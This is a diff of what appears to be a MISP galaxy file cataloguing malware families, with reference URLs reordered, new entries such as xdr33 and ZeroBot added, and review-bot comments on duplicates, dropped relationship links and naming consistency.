+ "https://blog.talosintelligence.com/2020/08/attribution-puzzle.html",
+ "https://us-cert.cisa.gov/sites/default/files/publications/AA21-116A_Russian_Foreign_Intelligence_Service_Cyber_Operations_508C.pdf",
+ "https://www.ncsc.gov.uk/files/Advisory-APT29-targets-COVID-19-vaccine-development.pdf",
+ "https://www.botconf.eu/wp-content/uploads/2018/12/2018-Y-Ishikawa-S-Nagano-Lets-go-with-a-Go-RAT-_final.pdf",
+ "https://blogs.jpcert.or.jp/en/2018/07/malware-wellmes-9b78.html",
+ "https://services.global.ntt/en-us/insights/blog/the-layered-infrastructure-operated-by-apt29",
+ "https://securelist.com/an-overview-of-targeted-attacks-and-apts-on-linux/98440/",
+ "https://www.pwc.co.uk/issues/cyber-security-services/insights/wellmess-analysis-command-control.html",
+ "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/",
+ "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf"
],
"synonyms": [],
"type": []
@@ -6607,15 +7102,30 @@
"uuid": "b0046a6e-3b8b-45ad-a357-dabc46aba7de",
"value": "elf.wellmess"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.whiterabbit",
+ "https://www.bleepingcomputer.com/news/security/march-2023-broke-ransomware-attack-records-with-459-incidents/",
+ "https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/Ransom.Win32.WHITERABBIT.YACAET"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "901b88e6-4759-4aa6-b4d1-9f7da53c2adf",
+ "value": "WhiteRabbit"
+ },
{
"description": "",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.winnti",
- "https://www.secureworks.com/research/threat-profiles/bronze-atlas",
- "https://intezer.com/blog/linux/elf-malware-analysis-101-linux-threats-no-longer-an-afterthought",
"https://attack.mitre.org/groups/G0096",
- "https://medium.com/chronicle-blog/winnti-more-than-just-windows-and-gates-e4f03436031a"
+ "https://medium.com/chronicle-blog/winnti-more-than-just-windows-and-gates-e4f03436031a",
+ "https://blog.exatrack.com/melofee/",
+ "https://intezer.com/blog/linux/elf-malware-analysis-101-linux-threats-no-longer-an-afterthought",
+ "https://www.secureworks.com/research/threat-profiles/bronze-atlas"
],
"synonyms": [],
"type": []
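Review bot: the context line `"value": "elf.wellmess"` in this hunk uses the Malpedia key where every neighbouring entry (WellMail, WhiteRabbit, Winnti) uses a display name, so the generated tag for this cluster is inconsistent with the rest of the galaxy. Because changing a value changes existing tags on events, fix it as a deliberate rename with the old value kept as a synonym rather than letting a refresh flip it.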
@@ -6628,8 +7138,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.wirenet",
- "http://contagiodump.blogspot.com/2012/12/aug-2012-backdoorwirenet-osx-and-linux.html",
- "https://news.drweb.com/show/?i=2679&lng=en&c=14"
+ "https://news.drweb.com/show/?i=2679&lng=en&c=14",
+ "http://contagiodump.blogspot.com/2012/12/aug-2012-backdoorwirenet-osx-and-linux.html"
],
"synonyms": [],
"type": []
@@ -6642,14 +7152,14 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.xagent",
- "https://securelist.com/an-overview-of-targeted-attacks-and-apts-on-linux/98440/",
- "http://researchcenter.paloaltonetworks.com/2016/02/a-look-into-fysbis-sofacys-linux-backdoor/",
+ "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf",
"https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html",
- "https://download.bitdefender.com/resources/media/materials/white-papers/en/Bitdefender_In-depth_analysis_of_APT28%E2%80%93The_Political_Cyber-Espionage.pdf",
- "https://www.secureworks.com/research/threat-profiles/iron-twilight",
"https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/",
"https://unit42.paloaltonetworks.com/a-look-into-fysbis-sofacys-linux-backdoor/",
- "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf"
+ "https://download.bitdefender.com/resources/media/materials/white-papers/en/Bitdefender_In-depth_analysis_of_APT28%E2%80%93The_Political_Cyber-Espionage.pdf",
+ "http://researchcenter.paloaltonetworks.com/2016/02/a-look-into-fysbis-sofacys-linux-backdoor/",
+ "https://securelist.com/an-overview-of-targeted-attacks-and-apts-on-linux/98440/",
+ "https://www.secureworks.com/research/threat-profiles/iron-twilight"
],
"synonyms": [
"chopstick",
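Review bot: the XAgent refs list both http://researchcenter.paloaltonetworks.com/2016/02/a-look-into-fysbis-sofacys-linux-backdoor/ and https://unit42.paloaltonetworks.com/a-look-into-fysbis-sofacys-linux-backdoor/, the same Fysbis write-up on the retired and the current Palo Alto host; keep the unit42.paloaltonetworks.com one. This is the same old-host/new-host duplication as the cadosecurity pair in the TeamTNT hunk, so a host-rewrite map in the generator would clear both.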
@@ -6666,8 +7176,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.xanthe",
- "https://www.ibm.com/downloads/cas/WMDZOWK6?social_post=5483919673&linkId=131648775",
"https://www.cadosecurity.com/abcbot-an-evolution-of-xanthe/",
+ "https://www.ibm.com/downloads/cas/WMDZOWK6?social_post=5483919673&linkId=131648775",
"https://blog.talosintelligence.com/2020/12/xanthe-docker-aware-miner.html"
],
"synonyms": [],
@@ -6694,46 +7204,50 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.xbash",
- "https://unit42.paloaltonetworks.com/atoms/agedlibra/",
- "https://researchcenter.paloaltonetworks.com/2018/09/unit42-xbash-combines-botnet-ransomware-coinmining-worm-targets-linux-windows/"
+ "https://researchcenter.paloaltonetworks.com/2018/09/unit42-xbash-combines-botnet-ransomware-coinmining-worm-targets-linux-windows/",
+ "https://unit42.paloaltonetworks.com/atoms/agedlibra/"
],
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "10c981cc-4ef1-4719-8ed7-c5e4c2f6c7a3",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "ee54fc1e-c574-4836-8cdb-992ac38cef32",
"value": "Xbash"
},
+ {
+ "description": "According to 360 netlab, this backdoor was derived from the leaked CIA Hive project. It propagates via a vulnerability in F5 and communicates using SSL with a forged Kaspersky certificate.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.xdr33",
+ "https://blog.netlab.360.com/headsup_xdr33_variant_of_ciahive_emeerges/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "c7b1cc91-7464-436e-ac40-3b06c98400a5",
+ "value": "xdr33"
+ },
{
"description": "Linux DDoS C&C Malware",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.xorddos",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/xorddos-kaiji-botnet-malware-variants-target-exposed-docker-servers/",
- "https://www.virusbulletin.com/uploads/pdf/conference/vb2015/KalnaiHorejsi-VB2015.pdf",
"https://www.blackberry.com/us/en/pdfviewer?file=/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-decade-of-the-rats.pdf",
- "https://www.intezer.com/blog/malware-analysis/new-linux-backdoor-redxor-likely-operated-by-chinese-nation-state-actor/",
- "https://www.lacework.com/groundhog-botnet-rapidly-infecting-cloud/",
- "https://www.ibm.com/downloads/cas/WMDZOWK6?social_post=5483919673&linkId=131648775",
- "https://www.botconf.eu/wp-content/uploads/2015/12/OK-P13-Liu-Ya-Automatically-Classify-Unknown-Bots-by-The-Register-Messages.pdf",
"https://blog.avast.com/2015/01/06/linux-ddos-trojan-hiding-itself-with-an-embedded-rootkit/",
"https://en.wikipedia.org/wiki/Xor_DDoS",
- "https://www.microsoft.com/security/blog/2022/05/19/rise-in-xorddos-a-deeper-look-at-the-stealthy-ddos-malware-targeting-linux-devices/",
- "https://maxkersten.nl/binary-analysis-course/analysis-scripts/ghidra-script-to-decrypt-a-string-array-in-xor-ddos/",
- "https://www.crowdstrike.com/blog/linux-targeted-malware-increased-by-35-percent-in-2021/",
"https://bartblaze.blogspot.com/2015/09/notes-on-linuxxorddos.html",
- "https://www.fireeye.com/blog/threat-research/2015/02/anatomy_of_a_brutef.html",
- "http://blog.malwaremustdie.org/2014/09/mmd-0028-2014-fuzzy-reversing-new-china.html",
"https://blog.checkpoint.com/wp-content/uploads/2015/10/sb-report-threat-intelligence-groundhog.pdf",
- "https://blog.nsfocusglobal.com/threats/vulnerability-analysis/analysis-report-of-the-xorddos-malware-family/"
+ "https://www.crowdstrike.com/blog/linux-targeted-malware-increased-by-35-percent-in-2021/",
+ "https://maxkersten.nl/binary-analysis-course/analysis-scripts/ghidra-script-to-decrypt-a-string-array-in-xor-ddos/",
+ "https://www.botconf.eu/wp-content/uploads/2015/12/OK-P13-Liu-Ya-Automatically-Classify-Unknown-Bots-by-The-Register-Messages.pdf",
+ "https://www.virusbulletin.com/uploads/pdf/conference/vb2015/KalnaiHorejsi-VB2015.pdf",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/xorddos-kaiji-botnet-malware-variants-target-exposed-docker-servers/",
+ "https://blog.nsfocusglobal.com/threats/vulnerability-analysis/analysis-report-of-the-xorddos-malware-family/",
+ "https://www.intezer.com/blog/malware-analysis/new-linux-backdoor-redxor-likely-operated-by-chinese-nation-state-actor/",
+ "https://www.lacework.com/groundhog-botnet-rapidly-infecting-cloud/",
+ "https://www.microsoft.com/security/blog/2022/05/19/rise-in-xorddos-a-deeper-look-at-the-stealthy-ddos-malware-targeting-linux-devices/",
+ "http://blog.malwaremustdie.org/2014/09/mmd-0028-2014-fuzzy-reversing-new-china.html",
+ "https://www.fireeye.com/blog/threat-research/2015/02/anatomy_of_a_brutef.html",
+ "https://www.ibm.com/downloads/cas/WMDZOWK6?social_post=5483919673&linkId=131648775"
],
"synonyms": [
"XORDDOS"
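Review bot: the `related` array on Xbash (dest-uuid 10c981cc-4ef1-4719-8ed7-c5e4c2f6c7a3, type `similar`, tagged almost-certain) is dropped here, and the same removal recurs through the rest of this patch (AdWind, Adzok, Banload, jSpy, QRat, Bateleur, FAKEUPDATES, GootLoader). If the generator stopped emitting cross-cluster relationships on purpose, the commit message should say so, since MISP correlation between galaxies depends on these links; if it was unintended, the `related` blocks need restoring before merge. The new xdr33 entry itself is consistent with its neighbours (Malpedia ref first, empty synonyms and type, UUID present).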
@@ -6743,6 +7257,21 @@
"uuid": "7f9df618-4bd1-44a1-ad88-e5930373aac4",
"value": "XOR DDoS"
},
+ {
+ "description": "ZeroBot is a Go-based botnet that spreads primarily through IoT and web application vulnerabilities. It is offered as malware as a service (MaaS) and infrastructure overlaps with DDoS-for-hire services seized by the FBI in December 2022.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.zerobot",
+ "https://www.microsoft.com/en-us/security/blog/2022/12/21/microsoft-research-uncovers-new-zerobot-capabilities/"
+ ],
+ "synonyms": [
+ "ZeroStresser"
+ ],
+ "type": []
+ },
+ "uuid": "458c583b-4353-4104-bee8-9e68cb77f151",
+ "value": "ZeroBot"
+ },
{
"description": "",
"meta": {
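Review bot: minor grammar in the new ZeroBot description, `It is offered as malware as a service (MaaS) and infrastructure overlaps with DDoS-for-hire services`, which needs `its` before `infrastructure`. Otherwise the entry follows the same shape as the surrounding clusters.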
@@ -6832,9 +7361,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/ios.lightspy",
+ "https://securelist.com/ios-exploit-chain-deploys-lightspy-malware/96407/",
"https://blog.trendmicro.com/trendlabs-security-intelligence/operation-poisoned-news-hong-kong-users-targeted-with-mobile-malware-via-local-news-links/",
- "https://documents.trendmicro.com/assets/Tech-Brief-Operation-Poisoned-News-Hong-Kong-Users-Targeted-with-Mobile-Malware-via-Local-News-Links.pdf",
- "https://securelist.com/ios-exploit-chain-deploys-lightspy-malware/96407/"
+ "https://documents.trendmicro.com/assets/Tech-Brief-Operation-Poisoned-News-Hong-Kong-Users-Targeted-with-Mobile-Malware-via-Local-News-Links.pdf"
],
"synonyms": [],
"type": []
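Review bot: this hunk only changes the order of the three LightSpy refs; nothing is added or removed. The same order-only churn appears in many hunks below (PoisonCarp, AdWind, JavaLocker, jRAT, Octopus Scanner, Qealler, QRat, Ratty, AirBreak, CactusTorch, ChromeBack, DarkWatchman, Grelos). Sorting `refs` deterministically in the generator (Malpedia URL first, then a stable order) would keep future diffs down to real content changes and make them reviewable.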
@@ -6862,9 +7391,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/ios.poisoncarp",
- "https://citizenlab.ca/2019/09/poison-carp-tibetan-groups-targeted-with-1-click-mobile-exploits/",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/new-android-spyware-actionspy-revealed-via-phishing-attacks-from-earth-empusa/",
"https://googleprojectzero.blogspot.com/2019/08/implant-teardown.html",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/new-android-spyware-actionspy-revealed-via-phishing-attacks-from-earth-empusa/"
+ "https://citizenlab.ca/2019/09/poison-carp-tibetan-groups-targeted-with-1-click-mobile-exploits/"
],
"synonyms": [
"INSOMNIA"
@@ -6919,21 +7448,21 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/jar.adwind",
- "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf",
- "https://citizenlab.ca/2015/12/packrat-report/",
- "https://www.zscaler.com/blogs/research/compromised-wordpress-sites-used-distribute-adwind-rat",
+ "https://research.checkpoint.com/malware-against-the-c-monoculture/",
"https://dissectingmalware.blogspot.com/2018/08/export-jratadwind-config-with-x32dbg.html",
"https://threatresearch.ext.hp.com/javascript-malware-dispensing-rats-into-the-wild/",
- "https://gist.github.com/herrcore/8336975475e88f9bc539d94000412885",
+ "https://www.securityinbits.com/malware-analysis/interesting-tactic-by-ratty-adwind-distribution-of-jar-appended-to-signed-msi/",
+ "https://www.zscaler.com/blogs/research/compromised-wordpress-sites-used-distribute-adwind-rat",
+ "https://blog.talosintelligence.com/2018/09/adwind-dodgesav-dde.html",
"http://blog.trendmicro.com/trendlabs-security-intelligence/spam-remote-access-trojan-adwind-jrat",
"https://www.fortinet.com/blog/threat-research/new-jrat-adwind-variant-being-spread-with-package-delivery-scam.html",
- "https://www.securityinbits.com/malware-analysis/interesting-tactic-by-ratty-adwind-distribution-of-jar-appended-to-signed-msi/",
- "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf",
+ "https://citizenlab.ca/2015/12/packrat-report/",
+ "https://blogs.seqrite.com/evolution-of-jrat-java-malware/",
"http://malware-traffic-analysis.net/2017/07/04/index.html",
- "https://research.checkpoint.com/malware-against-the-c-monoculture/",
- "https://blog.talosintelligence.com/2018/09/adwind-dodgesav-dde.html",
"https://marcoramilli.com/2018/08/20/interesting-hidden-threat-since-years/",
- "https://blogs.seqrite.com/evolution-of-jrat-java-malware/"
+ "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf",
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf",
+ "https://gist.github.com/herrcore/8336975475e88f9bc539d94000412885"
],
"synonyms": [
"AlienSpy",
@@ -6945,15 +7474,6 @@
],
"type": []
},
- "related": [
- {
- "dest-uuid": "ab4694d6-7043-41f2-b328-d93bec9c1b22",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "8eb9d4aa-257a-45eb-8c65-95c18500171c",
"value": "AdWind"
},
@@ -6967,15 +7487,6 @@
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "d08201b8-9774-41a1-abdb-c7f3828139b0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "90cb8ee6-52e6-4d8d-8f45-f04b9aec1f6c",
"value": "Adzok"
},
@@ -6986,21 +7497,12 @@
"https://malpedia.caad.fkie.fraunhofer.de/details/jar.banload",
"https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf",
"https://colin.guru/index.php?title=Advanced_Banload_Analysis",
- "https://www.welivesecurity.com/wp-content/uploads/2015/05/CPL-Malware-in-Brasil-zx02m.pdf",
- "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?name=TrojanDownloader%3AWin32%2FBanload"
+ "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?name=TrojanDownloader%3AWin32%2FBanload",
+ "https://www.welivesecurity.com/wp-content/uploads/2015/05/CPL-Malware-in-Brasil-zx02m.pdf"
],
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "d279bc1c-baa6-49aa-ab1b-7d012ae8db4e",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "30a61fa9-4bd1-427d-9382-ff7c33bd7043",
"value": "Banload"
},
@@ -7091,8 +7593,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/jar.javalocker",
- "https://dissectingmalwa.re/why-would-you-even-bother-javalocker.html",
- "https://id-ransomware.blogspot.com/2020/03/javalocker-ransomware.html"
+ "https://id-ransomware.blogspot.com/2020/03/javalocker-ransomware.html",
+ "https://dissectingmalwa.re/why-would-you-even-bother-javalocker.html"
],
"synonyms": [
"JavaEncrypt Ransomware"
@@ -7107,11 +7609,11 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/jar.jrat",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/jacksbot-has-some-dirty-tricks-up-its-sleeves/",
- "https://maskop9.wordpress.com/2019/02/06/analysis-of-jacksbot-backdoor/",
- "https://www.eff.org/files/2018/01/29/operation-manul.pdf",
"https://research.checkpoint.com/malware-against-the-c-monoculture/",
- "https://www.intego.com/mac-security-blog/new-multiplatform-backdoor-jacksbot-discovered"
+ "https://www.intego.com/mac-security-blog/new-multiplatform-backdoor-jacksbot-discovered",
+ "https://maskop9.wordpress.com/2019/02/06/analysis-of-jacksbot-backdoor/",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/jacksbot-has-some-dirty-tricks-up-its-sleeves/",
+ "https://www.eff.org/files/2018/01/29/operation-manul.pdf"
],
"synonyms": [
"Jacksbot"
@@ -7131,15 +7633,6 @@
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "8abd10df-2c31-4895-8ec1-270603078f47",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "ff24997d-1f17-4f00-b9b8-b3392146540f",
"value": "jSpy"
},
@@ -7148,8 +7641,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/jar.octopus_scanner",
- "https://securitylab.github.com/research/octopus-scanner-malware-open-source-supply-chain",
- "http://blog.nsfocus.net/github-ocs-0605/"
+ "http://blog.nsfocus.net/github-ocs-0605/",
+ "https://securitylab.github.com/research/octopus-scanner-malware-open-source-supply-chain"
],
"synonyms": [],
"type": []
@@ -7175,13 +7668,13 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/jar.qealler",
+ "https://www.herbiez.com/?p=1352",
"https://github.com/jeFF0Falltrades/Malware-Writeups/blob/master/Qealler/Qealler-Unloaded.pdf",
+ "https://www.securityinbits.com/malware-analysis/similarity-between-qealler-pyrogenic-variants-part-0x3/",
+ "https://www.zscaler.com/blogs/research/qealler-new-jar-based-information-stealer",
"https://www.securityinbits.com/malware-analysis/unpacking/unpacking-pyrogenic-qealler-using-java-agent-part-0x2/",
"https://www.cyberark.com/threat-research-blog/qealler-the-silent-java-credential-thief/",
- "https://www.securityinbits.com/malware-analysis/similarity-between-qealler-pyrogenic-variants-part-0x3/",
- "https://www.securityinbits.com/malware-analysis/pyrogenic-infostealer-static-analysis-part-0x1/",
- "https://www.herbiez.com/?p=1352",
- "https://www.zscaler.com/blogs/research/qealler-new-jar-based-information-stealer"
+ "https://www.securityinbits.com/malware-analysis/pyrogenic-infostealer-static-analysis-part-0x1/"
],
"synonyms": [
"Pyrogenic Infostealer"
@@ -7198,23 +7691,14 @@
"https://malpedia.caad.fkie.fraunhofer.de/details/jar.qrat",
"https://www.trustwave.com/Resources/SpiderLabs-Blog/Quaverse-RAT--Remote-Access-as-a-Service/",
"https://www.digitrustgroup.com/java-rat-qrat/",
- "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/updated-qnode-rat-downloader-distributed-as-trump-video-scandal/",
- "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/rats-and-spam-the-nodejs-qrat/"
+ "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/rats-and-spam-the-nodejs-qrat/",
+ "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/updated-qnode-rat-downloader-distributed-as-trump-video-scandal/"
],
"synonyms": [
"Quaverse RAT"
],
"type": []
},
- "related": [
- {
- "dest-uuid": "c3a784ee-cef7-4604-a5ba-ec7b193a5152",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "ef385825-bfa1-4e8c-b368-522db78cf1bd",
"value": "QRat"
},
@@ -7223,8 +7707,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/jar.ratty",
- "https://threatresearch.ext.hp.com/javascript-malware-dispensing-rats-into-the-wild/",
- "https://www.securityinbits.com/malware-analysis/interesting-tactic-by-ratty-adwind-distribution-of-jar-appended-to-signed-msi/"
+ "https://www.securityinbits.com/malware-analysis/interesting-tactic-by-ratty-adwind-distribution-of-jar-appended-to-signed-msi/",
+ "https://threatresearch.ext.hp.com/javascript-malware-dispensing-rats-into-the-wild/"
],
"synonyms": [],
"type": []
@@ -7250,18 +7734,20 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/jar.strrat",
- "https://twitter.com/MsftSecIntel/status/1395138347601854465",
- "https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries",
- "https://www.gdatasoftware.com/blog/strrat-crimson",
- "https://threatresearch.ext.hp.com/javascript-malware-dispensing-rats-into-the-wild/",
- "https://www.jaiminton.com/reverse-engineering/strrat",
- "https://umbrella.cisco.com/blog/cybersecurity-threat-spotlight-strrat-zloader-honeygain",
- "https://www.deepinstinct.com/blog/understanding-the-windows-javascript-threat-landscape",
"https://forensicitguy.github.io/strrat-attached-to-msi/",
- "https://www.jaiminton.com/reverse-engineering/strrat#",
- "https://isc.sans.edu/diary/rss/27798",
+ "https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries",
+ "https://threatresearch.ext.hp.com/javascript-malware-dispensing-rats-into-the-wild/",
+ "https://any.run/cybersecurity-blog/strrat-malware-analysis-of-a-jar-archive/",
+ "https://threatresearch.ext.hp.com/wp-content/uploads/2021/10/HP-Wolf-Security-Threat-Insights-Report-Q3-2021.pdf",
+ "https://umbrella.cisco.com/blog/cybersecurity-threat-spotlight-strrat-zloader-honeygain",
"https://www.fortinet.com/blog/threat-research/new-strrat-rat-phishing-campaign",
- "https://threatresearch.ext.hp.com/wp-content/uploads/2021/10/HP-Wolf-Security-Threat-Insights-Report-Q3-2021.pdf"
+ "https://www.jaiminton.com/reverse-engineering/strrat",
+ "https://www.deepinstinct.com/blog/understanding-the-windows-javascript-threat-landscape",
+ "https://resources.securityscorecard.com/cybersecurity/analyze-java-malware-strrat#page=1",
+ "https://www.gdatasoftware.com/blog/strrat-crimson",
+ "https://isc.sans.edu/diary/rss/27798",
+ "https://www.jaiminton.com/reverse-engineering/strrat#",
+ "https://twitter.com/MsftSecIntel/status/1395138347601854465"
],
"synonyms": [],
"type": []
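Review bot: `https://www.jaiminton.com/reverse-engineering/strrat` and `https://www.jaiminton.com/reverse-engineering/strrat#` are the same page and both survive the reordering; drop the variant with the trailing `#` so the list stays deduplicated. The two genuinely new refs (any.run and securityscorecard) look fine.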
@@ -7302,8 +7788,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/js.airbreak",
- "https://www.secureworks.com/research/threat-profiles/bronze-mohawk",
"http://www.kahusecurity.com/posts/reflow_javascript_backdoor.html",
+ "https://www.secureworks.com/research/threat-profiles/bronze-mohawk",
"https://www.fireeye.com/blog/threat-research/2018/07/chinese-espionage-group-targets-cambodia-ahead-of-elections.html"
],
"synonyms": [
@@ -7319,24 +7805,15 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/js.bateleur",
- "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf",
- "https://www.secureworks.com/research/threat-profiles/gold-niagara",
- "https://www.proofpoint.com/us/threat-insight/post/fin7carbanak-threat-actor-unleashes-bateleur-jscript-backdoor",
+ "https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-1/",
"https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf",
- "https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-1/"
+ "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf",
+ "https://www.proofpoint.com/us/threat-insight/post/fin7carbanak-threat-actor-unleashes-bateleur-jscript-backdoor",
+ "https://www.secureworks.com/research/threat-profiles/gold-niagara"
],
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "81faf0c1-0595-436b-a66a-05d8b435bccd",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "fb75a753-24ba-4b58-b7ed-2e39b0c68c65",
"value": "Bateleur"
},
@@ -7360,12 +7837,12 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/js.cactustorch",
- "https://github.com/mdsecactivebreach/CACTUSTORCH",
- "https://www.macnica.net/file/mpression_automobile.pdf",
- "https://www.microsoft.com/security/blog/2020/09/24/gadolinium-detecting-empires-cloud/",
- "https://www.codercto.com/a/46729.html",
"https://www.seqrite.com/documents/en/white-papers/Seqrite-WhitePaper-Operation-SideCopy.pdf",
- "https://forensicitguy.github.io/analyzing-cactustorch-hta-cobaltstrike/"
+ "https://www.macnica.net/file/mpression_automobile.pdf",
+ "https://forensicitguy.github.io/analyzing-cactustorch-hta-cobaltstrike/",
+ "https://www.codercto.com/a/46729.html",
+ "https://www.microsoft.com/security/blog/2020/09/24/gadolinium-detecting-empires-cloud/",
+ "https://github.com/mdsecactivebreach/CACTUSTORCH"
],
"synonyms": [],
"type": []
@@ -7378,8 +7855,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/js.chromeback",
- "https://www.gosecure.net/blog/2022/02/10/malicious-chrome-browser-extension-exposed-chromeback-leverages-silent-extension-loading/",
- "https://unit42.paloaltonetworks.com/chromeloader-malware/"
+ "https://unit42.paloaltonetworks.com/chromeloader-malware/",
+ "https://www.gosecure.net/blog/2022/02/10/malicious-chrome-browser-extension-exposed-chromeback-leverages-silent-extension-loading/"
],
"synonyms": [],
"type": []
@@ -7421,8 +7898,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/js.darkwatchman",
- "https://securityintelligence.com/posts/hive00117-fileless-malware-delivery-eastern-europe/",
- "https://www.prevailion.com/darkwatchman-new-fileness-techniques/"
+ "https://www.prevailion.com/darkwatchman-new-fileness-techniques/",
+ "https://securityintelligence.com/posts/hive00117-fileless-malware-delivery-eastern-europe/"
],
"synonyms": [],
"type": []
@@ -7451,6 +7928,7 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/js.doenerium",
+ "https://perception-point.io/doenerium-malware/",
"https://twitter.com/0xToxin/status/1572612089901993985"
],
"synonyms": [],
@@ -7475,21 +7953,21 @@
"value": "Enrume"
},
{
- "description": "",
+ "description": "According proofpoint, EvilNum is a backdoor that can be used for data theft or to load additional payloads. The malware includes multiple interesting components to evade detection and modify infection paths based on identified antivirus software.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/js.evilnum",
- "http://blog.nsfocus.net/agentvxapt-evilnum/",
+ "https://www.clearskysec.com/wp-content/uploads/2019/08/ClearSky-2019-H1-Cyber-Events-Summary-Report.pdf",
"https://github.com/eset/malware-ioc/tree/master/evilnum",
+ "http://blog.nsfocus.net/agentvxapt-evilnum/",
+ "https://www.welivesecurity.com/2020/07/09/more-evil-deep-look-evilnum-toolset/",
+ "https://www.zscaler.com/blogs/security-research/return-evilnum-apt-updated-ttps-and-new-targets",
+ "http://www.pwncode.io/2018/05/javascript-based-bot-using-github-c.html",
+ "https://mp.weixin.qq.com/s/REXBtbnI2zXj4H3u6ofMMw",
"https://unit42.paloaltonetworks.com/cardinal-rat-sins-again-targets-israeli-fin-tech-firms/",
"https://blog.prevailion.com/2020/05/phantom-in-command-shell5.html",
"https://securelist.com/apt-trends-report-q3-2020/99204/",
- "https://mp.weixin.qq.com/s/REXBtbnI2zXj4H3u6ofMMw",
- "http://www.pwncode.io/2018/05/javascript-based-bot-using-github-c.html",
- "https://www.welivesecurity.com/2020/07/09/more-evil-deep-look-evilnum-toolset/",
